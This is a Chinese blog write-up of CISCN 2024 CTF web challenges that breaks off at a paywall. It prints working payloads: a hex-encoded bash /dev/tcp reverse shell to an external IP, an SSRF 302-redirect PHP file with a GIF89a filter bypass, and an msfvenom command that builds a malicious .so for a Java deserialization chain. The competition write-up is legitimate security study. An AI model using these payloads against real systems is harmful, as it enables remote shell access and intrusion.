【Web】CISCN 2024初赛 题解(全)

于 2024-12-11 12:27:11 发布
阅读量1k 收藏 17
点赞数 8
CC 4.0 BY-SA版权
文章标签: 前端 android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/web15117360223/article/details/144397416

目录

Simple_php

easycms

easycms_revenge

ezjava

mossfern

sanic

Simple_php

用php -r进行php代码执行

因为ban了引号,考虑hex2bin,将数字转为字符串

php -r eval(hex2bin(16进制));

注意下面这段报错,因为加不了引号,开头是数字的话,就会将类型识别为数字,若后续出现了字符串就会报错

用substr来截一下,从而将类型转换为字符串

cmd=php -r $a=substr(Z62617368202d63202262617368202d69203e26202f6465762f7463702f3132342e3232322e3133362e33332f3133333720303e263122,1);system(hex2bin($a));

反弹shell后进行当前目录的查找

flag不在web目录下

去查数据库拿到flag

easycms

提示打SSRF

https://m.xunruicms.com/bug/?

在$thumb处传入url即可访问

不能直接传127.0.0.1,打302

?s=api&c=api&m=qrcode&text=xxx&size=1024&level=1&thumb=http://124.222.136.33:1338/302.php

302.php

<?php
header("Location:http://127.0.0.1/flag.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F124.222.136.33%2F1337%200%3E%261%22");

反弹shell

根目录下./readflag

easycms_revenge

和上题一样,改一下302.php的内容

GIF89a
<html>
<?php
header("Location:http://127.0.0.1/flag.php?cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F124.222.136.33%2F1337%200%3E%261%22");?>
</html>

这里注意细节,靶机发了两次请求,第一次我们就返回一个正常的图片,第二次请求就发一个302,php代码块要用html标签包裹

ezjava

/app/BOOT-INF/lib下删了jackson,不然就能直接打POJONode

依赖里有AspectJWeaver,打任意文件写入

【Web】浅聊Java反序列化之AspectJWeaver——任意文件写入-优快云博客

后续还可以配合sqlite加载恶意so文件

JavaSec/9.JDBC Attack/SQLite/index.md at main · Y4tacker/JavaSec · GitHub

然后AJ链子的入口要调用map.put

自定义类UserBean#readObject就可以配合利用

最终思路就是先mysql打入恶意反序列化数据写入so文件,再sqlite加载恶意so文件

生成恶意so文件

msfvenom -p linux/x64/exec CMD='echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjEi|base64 -d|bash' -f elf-so -o evil.so

将生成的恶意序列化数据写入output.se

最低0.47元/天 解锁文章

200万优质内容无限畅学
CISCN-WEB-ikun
迷风小白
09-17 3597
知识点 薅羊毛与逻辑漏洞 cookie伪造 python反序列化 IKUN 1.拿到题目,先注册一个账号登录 2.登录进去发现存在账户余额,且根据题目提示需要购买lv6 3.这里的商品目录很多,一页一页找太麻烦了,所以可以写个脚本搜一下 import requests url = "http://acb60e5d-e45c-417d-92b0-0175588a97ab.node1.bu...
CISCN2024个人题解(较为简单)
HY_Czy的博客
05-20 997
2024CISCN
CISCN2024-Web方向题解
Err0r233的博客
05-21 2682
CISCN打烂了,几个题都是差一点就出,自己还是太菜了。
第十七届国大学生信息安竞赛创新实践能力赛初赛CISCN-2024部分WP)
Welcome To Myon'Blog !
05-20 3667
给的 e 其实就是 d,只是结果是移位后的输出,n 很大无法分解,但 kk 与 rr 很小,由 rr= e//n 即可推出 rr 和 kk,又由 e + x + kk*p + rr*((p+1)* (q+1))+ 1 = 65537,将 × 设为 0 和 2^200 然后联立求解一元二次方程,就能求出 p, q 的上下界,这样就有p 和q 的高位,枚举未知位尝试coppersmith 直到分解出结果,最后代入求 e 和 d,进而求得flag。
CISCN2021初赛WriteUp
Hellsegamosken
05-19 1182
第一次打 ctf,啥也没学,赛前一道题没做过,了解了下 IDA 的使用就上了。 glass 200 分 reverse,安卓逆向,.apk 改 .zip 解压,classes.dex 转 classes.jar 后打开,找到 MainActivity 开始读代码。 发现调用了 public native boolean checkFlag(String paramString); 这样一个函数,但这个函数并没有写出来。搜了一下 native 关键字,发现是用来调用本地 C 代码的。然后在 glass\li
2023ciscn初赛(部分misc)
最新发布
萌新一枚
09-23 581
ciscn2023初赛部分MISC题解
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3
arttnba3的博客
05-21 886
【CTF题解NO.00009】CISCN2021-初赛-pwn write up by arttnba3[GITHUB BLOG ADDR](https://arttnba3.cn/2021/05/15/CTF-0X04-CISCN2021-PRELIMINARY/)0x00.绪论0x01.场景实操 开场卷pwny | Donelonelywolf | Donechannel0x02.场景实操 二阶卷silverwolf | Donegame0x03.场景实操 冲刺卷satool GITHUB BLOG A
2023-2024年中国计算机应用技术大赛-国算法精英大赛第一场初赛题解.zip
03-18
《2023-2024年中国计算机应用技术大赛-国算法精英大赛第一场初赛题解》 本资料集合包含了2023-2024年度中国计算机应用技术大赛首场国算法精英大赛的初步比赛题解,旨在帮助参赛者理解和解决比赛中的算法问题,...
2022 CISCN初赛 Satool
weixin_46483787的博客
06-09 744
2022年国赛初赛的一道高分pwn题,之前没有接触过LLVM PASS类的pwn题,正好入个门
2021-CISCN-初赛 总结
Chmaz的博客
05-21 1153
第一次打ctf比赛,之前也没怎么做过题,果然被虐惨了,队一个题也没做出来. 选择 几乎都看不懂,目前大一,专业知识几乎还未涉猎,还好是开卷,拿了625分. 杂项 Running_pixel 题目给了一个gif图 比赛时候想了很久,唯一能着手的点就是发现,gif每10帧图片会变色,但是就此思路就断了,怎么处理也没有什么思路. 其实当时一度离正确思路非常近, 当时我在第十帧经过处理后发现一个奇妙的点点.但是当时并没有多想. 结果正确思路就是把每十帧的图片对比每位像素,合在一张图上得到这样的图片,按顺序.
[CISCN 2019 初赛]Love Math
m0_52432374的博客
05-04 147
[CISCN2021] 初赛 easy_source
fightte的博客
05-21 569
[CISCN2021] 初赛 easy_source 国赛,很有经历和意义,希望继续挑战 国赛和大家做的一道题,国赛比较难,只有现在有时间回过去看看: 进去后,界面大概如上图, 提示如上图: 猜测备份文件,实际上当时没扫描出来,试了.svn .swp .swo等,后来别个提示才发现: 实际上前面要加一个点,也就是.index.php.swo 现在看来应该去考虑php的原生类反序列化,是一个典型题目: 使用[反射类]new ReflectionClass("类名"),获得这个类的信息 参考:http
CISCN2020初赛_Web
Lemon's blog
08-30 1223
easytrick <?php class trick{ public $trick1; public $trick2; public function __destruct(){ $this->trick1 = (string)$this->trick1; if(strlen($this->trick1) > 5 || strlen($this->trick2) > 5){ die(
CISCN2022初赛题解WriteUp-MapleLeaves
Do1phln的博客
06-04 3867
Do1phln b477ery sfc9982 0HBthinkphp 6.0.12lts 存在反序列化漏洞 https://www.freebuf.com/vuls/321546.html 扫描可知 www.zip 存在源码泄露,下载后可知存在反序列化路由 online_crt c_rehash 存在漏洞 https://www.secrss.com/articles/42602 CVE-2022-1292 先通过 /getcrt 获取文件名 再通过 /proxy 访问 go 服务更改文件名为命令 最
第十三届国大学生信息安竞赛 2020CISCN 线上初赛Writeup
末初 · mochu7
09-06 5974
第十三届国大学生信息安竞赛
[2024CISCN]国赛初赛WEB题目复现_2024国赛初赛unzip题目复现
qd520_1314的博客
04-14 1245
一般来说,需要通过报错来获取信息,但是不管对name怎么fuzz,由于传参限制都无法报错。看了其他师傅的wp后才发现,可以使得name参数为空来报错。。。。报错信息中,有用的除了一些路径外,值得注意的是这几行无法ssti,也没什么用。又坐牢了一段时间,无奈之下又只能瞅一瞅师傅们的wp,好家伙,原来是空的,逗人玩呢。那就修改一下Admin的路由,用来获取admin的session拿着伪造的session去访问靶机的admin路由,提示我们用ssti,那就ssti。
[CISCN 2019 初赛]Love Math -wp
freerats的博客
08-19 622
<?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ show_source(__FILE__); }else{ //例子 c=20-1 $content = $_GET['c']; if (strlen($content) >= 80) { die("太长了不会算"); } $blacklist = [' ', '\t', '\r'
中国计算机应用技术大赛初赛题解解析
资源摘要信息:"本资源为2023-2024年中国计算机应用技术大赛-国算法精英大赛第一场初赛题解的集合,包含了解题思路、算法细节及代码实现等关键信息。文件格式为压缩包,内部包含多个以字母命名的Markdown文档,每个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值